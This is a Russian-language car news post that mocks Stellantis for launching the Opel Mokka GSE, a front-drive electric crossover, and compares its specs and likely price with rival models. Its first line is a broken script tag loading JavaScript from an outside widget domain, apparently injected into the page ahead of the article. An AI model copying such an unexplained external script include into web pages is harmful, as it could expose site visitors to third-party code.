script type="text/javascript" src="https://cdnwidget.simplejsmenu.com/public/lib.en.min.js">

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Корпорации Stellantis пытается в пятый раз продать европейцам не слишком привлекательный продукт, а именно дорогой переднеприводный субкомпактный электромобиль с небольшим запасом хода — на сей раз под маской Opel Mokka GSE.

Всё началось весной прошлого года с анонса хот-хэтча Lancia Ypsilon HF, затем были представлены спортивные кроссоверы Alfa Romeo Junior Veloce и Abarth 600e, на прошлой неделе дебютировал хот-хэтч Peugeot E-208 GTi — всё это наиболее мощные электрические отпрыски морально устаревшей платформы CMP корпорации Stellantis, пытающейся совместить экоповестку с ностальгией европейцев по золотой эпохе хот-хэтчей.

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Ещё в прошлом десятилетии Opel умел в бензиновые хот-хэтчи, на фото — Corsa D в топ-версии OPC с 1,6-литровым бензиновым трубомотором мощностью 192 л.с., а в версии Nürburgring Edition он выдавал 211 л.с.

В 1980-х, 1990-х и 2000-х хот-хэтчей на рынке было много и стоили они вменяемых денег. Сегодня эталоном хот-хэтча в малом классе справедливо считается бензиновый полноприводный Toyota GR Yaris — да, он стоит дорого (от 51 990 евро в Германии), но зато олицетворяет для многих мечту о «зажигалке» на каждый день и благоприятно влияет на имидж компании Toyota, которая сегодня считается едва ли не последним защитником традиционных автомобильных ценностей в массовом сегменте авторынка. Благодаря большой ассортименту гибридных моделей с низкими выбросами CO2 Toyota сегодня может позволить себе несколько мощных бензиновых моделей, а вот Stellantis не может, поэтому пичкает клиентов электрическими эрзацами.

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Opel Mokka GSE

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Opel Mokka GSE

В мае принадлежащий Stellantis бренд Opel представил раллийный электрический кроссовер Opel Mokka GSE Rally, а на этой неделе анонсирован его дорожный тёзка без приставки Rally. Сообщается, что сейчас Opel Mokka GSE проходит финальные доводочные испытания и скоро состоится премьера, хотя не очень понятно, чего там доводить — всё уже доведено на родственных кроссоверах Alfa Romeo Junior Veloce и Abarth 600e. Впрочем, ясно, что пресс-службе Opel нужно создавать иллюзию независимости немецкого бренда в условиях навязанной Stellantis жесточайшей унификации. Всё, что сегодня могут позволить себе принадлежащие Stellantis массовые бренды, — это упражняться в заданных рамках с дизайном, а всё «железо» — общее и, к сожалению, довольно заурядное.

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Opel Mokka GSE

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Opel Mokka GSE

Итак, под капотом Opel Mokka GSE мы увидим тот же единственный электромотор, каким оснащены все вышеперечисленные модели на платформе CMP, его максимальная отдача — 280 л.с. и 345 Нм, привод только передний, контролировать тягу помогает самоблокирующийся дифференциал Torsen. Будет заниженная спортивная подвеска с расширенной колеёй, будет агрессивный декор кузова, будут спортивные кресла в салоне и прочая драйверская атрибутика. Ну и, конечно, будет всё та же скромная батарея на 54 кВт·ч с максимальной мощностью зарядки в 100 кВт, на которой в боевом режиме далеко от розетки не уедешь.

То же яйцо, только в профиль: Opel официально анонсировал спортивный Mokka GSE

Opel Mokka GSE Rally (на переднем плане) и Opel Mokka GSE

Цена Opel Mokka GSE пока неизвестна, но ясно, что дёшево не будет. Для ориентира скажем, что Abarth 600e стоит в Германии от 44 990 евро (с 280-сильным электромотором — от 48 990 евро), Alfa Romeo Junior Veloce — от 48 500 евро. В иерархии Stellantis бренд Opel считается более демократичным, чем Abarth и Alfa Romeo, но вряд ли Mokka GSE будет стоить менее 40 000 евро. Как говорится, лучше подкопить ещё «десятку», взять Toyota GR Yaris и кайфовать без всяких ограничений. На что рассчитывает Stellantis, выводя на рынок пять однотипных неликвидных спортивных моделей, не очень понятно — видимо, на какое-то чудо.

От admin

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *